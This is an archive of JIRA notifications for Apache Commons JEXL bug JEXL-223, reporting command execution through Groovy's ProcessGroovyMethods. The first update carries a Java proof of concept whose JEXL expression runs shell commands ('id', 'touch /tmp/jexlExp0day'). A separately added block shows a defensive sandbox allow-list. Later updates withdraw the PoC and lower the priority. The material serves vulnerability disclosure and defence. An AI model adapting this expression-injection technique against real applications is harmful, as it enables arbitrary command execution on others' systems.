[jira] [Updated] (JEXL-223) Apache Commons JEXL Expression Execute Command Vulnerability

2017-04-21 Thread Bruno P. Kinoshita (JIRA)

[ https://issues.apache.org/jira/browse/JEXL-223?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]

Bruno P. Kinoshita updated JEXL-223:

Description: 
0x01 Summary
Apache Commons JEXL Expression Execute Command Vulnerability through Groovy.

0x02 POC
{code}
import java.io.IOException;
import java.util.List;

import org.apache.commons.jexl3.JexlBuilder;
import org.apache.commons.jexl3.JexlContext;
import org.apache.commons.jexl3.JexlEngine;
import org.apache.commons.jexl3.JexlExpression;
import org.apache.commons.jexl3.MapContext;
import org.codehaus.groovy.runtime.ProcessGroovyMethods;

public class elExp {
    public static void main(String args[]) throws IOException {
        // Create or retrieve an engine
        JexlEngine jexl = new JexlBuilder().create();
        // Create an expression
        //String jexlExp = "new(\"java.lang.String\", \"hello wolrd\")";
        ProcessGroovyMethods n = new ProcessGroovyMethods();
        System.out.println(n.execute("id").toString());
        String jexlExp = "new(\"org.codehaus.groovy.runtime.ProcessGroovyMethods\").execute(\"touch /tmp/jexlExp0day\")";
        JexlExpression e = jexl.createExpression( jexlExp );
        try {
            Process process = new ProcessBuilder("id").start();
        } catch (IOException e1) {
            // TODO Auto-generated catch block
            e1.printStackTrace();
        }
        // Create a context and add data
        JexlContext jc = new MapContext();
        jc.set("foo", jexlExp );

        // Now evaluate the expression, getting the result
        Object o = e.evaluate(jc);
        System.out.println(o);
    }
}
{code}



> Apache Commons JEXL Expression Execute Command Vulnerability
> --
>
> Key: JEXL-223
> URL: https://issues.apache.org/jira/browse/JEXL-223
> Project: Commons JEXL
> Issue Type: Bug
> Reporter: cnbird
> Priority: Critical
>
> 0x01 Summary
> Apache Commons JEXL Expression Execute Command Vulnerability through Groovy.
> 0x02 POC
> {code}
> import java.io.IOException;
> import java.util.List;
> import org.apache.commons.jexl3.JexlBuilder;
> import org.apache.commons.jexl3.JexlContext;
> import org.apache.commons.jexl3.JexlEngine;
> import org.apache.commons.jexl3.JexlExpression;
> import org.apache.commons.jexl3.MapContext;
> import org.codehaus.groovy.runtime.ProcessGroovyMethods;
> public class elExp {
>   public static void main(String args[]) throws IOException {
>   // Create or retrieve an engine
>   JexlEngine jexl = new JexlBuilder().create();
>   // Create an expression
>   //String jexlExp = "new(\"java.lang.String\", \"hello wolrd\")";
>   ProcessGroovyMethods n = new ProcessGroovyMethods();
>   System.out.println(n.execute("id").toString());
>   String jexlExp = 
> "new(\"org.codehaus.groovy.runtime.ProcessGroovyMethods\").execute(\"touch 
> /tmp/jexlExp0day\")";
>   JexlExpression e = jexl.createExpression( jexlExp );
>   tr
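
Added example, not part of the JIRA thread and not code from the JEXL project: the PoC expression in the message above works because `new(...)` may name any class on the classpath, so the code below builds an engine with a deny-by-default `JexlSandbox` (JEXL 3.1 API) in which only listed classes can be constructed or called. The class name `SandboxedJexl`, the helper names and the choice of `java.lang.String` as the only permitted class are assumptions made for illustration.

```java
import org.apache.commons.jexl3.JexlBuilder;
import org.apache.commons.jexl3.JexlEngine;
import org.apache.commons.jexl3.JexlException;
import org.apache.commons.jexl3.MapContext;
import org.apache.commons.jexl3.introspection.JexlSandbox;

public class SandboxedJexl {

    /** Engine that denies every class unless it is explicitly listed. */
    static JexlEngine restrictedEngine() {
        // false = classes without an explicit permission are denied
        JexlSandbox sandbox = new JexlSandbox(false);
        // Allow only what the application's expressions need
        // (assumption for this example: java.lang.String).
        sandbox.white("java.lang.String");
        return new JexlBuilder()
                .sandbox(sandbox)
                .strict(true)   // unresolved constructors and methods are errors
                .silent(false)  // and are raised as exceptions, not only logged
                .create();
    }

    /** Returns true when the engine refuses to evaluate the expression. */
    static boolean isRejected(JexlEngine jexl, String source) {
        try {
            jexl.createExpression(source).evaluate(new MapContext());
            return false;
        } catch (JexlException refused) {
            return true;
        }
    }

    public static void main(String[] args) {
        JexlEngine jexl = restrictedEngine();
        // Constructed inputs: one class on the allow list, one that is not.
        String allowed = "new('java.lang.String', 'hello').length()";
        String notListed = "new('java.lang.StringBuilder', 'x')";
        System.out.println("allowed rejected?    " + isRejected(jexl, allowed));
        System.out.println("not listed rejected? " + isRejected(jexl, notListed));
    }
}
```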

[jira] [Updated] (JEXL-223) Apache Commons JEXL Expression Execute Command Vulnerability

2017-04-21 Thread cnbird (JIRA)

[ https://issues.apache.org/jira/browse/JEXL-223?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]

cnbird updated JEXL-223:

Description: 
0x01 Summary
Apache Commons JEXL Expression Execute Command Vulnerability through Groovy.

0x02 POC
POC Report to Apache Security Email Address.



> Apache Commons JEXL Expression Execute Command Vulnerability
> --
>
> Key: JEXL-223
> URL: https://issues.apache.org/jira/browse/JEXL-223
> Project: Commons JEXL
> Issue Type: Bug
> Reporter: cnbird
> Priority: Critical
>
> 0x01 Summary
> Apache Commons JEXL Expression Execute Command Vulnerability through Groovy.
> 0x02 POC
> POC Report to Apache Security Email Address.



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Updated] (JEXL-223) Apache Commons JEXL Expression Execute Command Vulnerability

2017-04-21 Thread cnbird (JIRA)

[ https://issues.apache.org/jira/browse/JEXL-223?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]

cnbird updated JEXL-223:

Description: 
0x01 Summary
Apache Commons JEXL Expression Execute Command Vulnerability through Groovy.

0x02 POC
POC Report to Apache Security Email Address secur...@apache.org.

  was:
0x01 Summary
Apache Commons JEXL Expression Execute Command Vulnerability through Groovy.

0x02 POC
POC Report to Apache Security Email Address.


> Apache Commons JEXL Expression Execute Command Vulnerability
> --
>
> Key: JEXL-223
> URL: https://issues.apache.org/jira/browse/JEXL-223
> Project: Commons JEXL
> Issue Type: Bug
> Reporter: cnbird
> Priority: Critical
>
> 0x01 Summary
> Apache Commons JEXL Expression Execute Command Vulnerability through Groovy.
> 0x02 POC
> POC Report to Apache Security Email Address secur...@apache.org.





[jira] [Updated] (JEXL-223) Apache Commons JEXL Expression Execute Command Vulnerability

2017-04-25 Thread Henri Biestro (JIRA)

[ https://issues.apache.org/jira/browse/JEXL-223?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]

Henri Biestro updated JEXL-223:
---
Affects Version/s: 3.1

> Apache Commons JEXL Expression Execute Command Vulnerability
> --
>
> Key: JEXL-223
> URL: https://issues.apache.org/jira/browse/JEXL-223
> Project: Commons JEXL
> Issue Type: Bug
> Affects Versions: 3.1
> Reporter: cnbird
> Priority: Critical
>
> 0x01 Summary
> Apache Commons JEXL Expression Execute Command Vulnerability through Groovy.
> 0x02 POC
> POC Report to Apache Security Email Address secur...@apache.org.





[jira] [Updated] (JEXL-223) Apache Commons JEXL Expression Execute Command Vulnerability

2017-04-25 Thread Sebb (JIRA)

[ https://issues.apache.org/jira/browse/JEXL-223?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]

Sebb updated JEXL-223:
--
Priority: Minor  (was: Critical)

> Apache Commons JEXL Expression Execute Command Vulnerability
> --
>
> Key: JEXL-223
> URL: https://issues.apache.org/jira/browse/JEXL-223
> Project: Commons JEXL
> Issue Type: Bug
> Affects Versions: 3.1
> Reporter: cnbird
> Priority: Minor
>
> 0x01 Summary
> Apache Commons JEXL Expression Execute Command Vulnerability through Groovy.
> 0x02 POC
> POC Report to Apache Security Email Address secur...@apache.org.


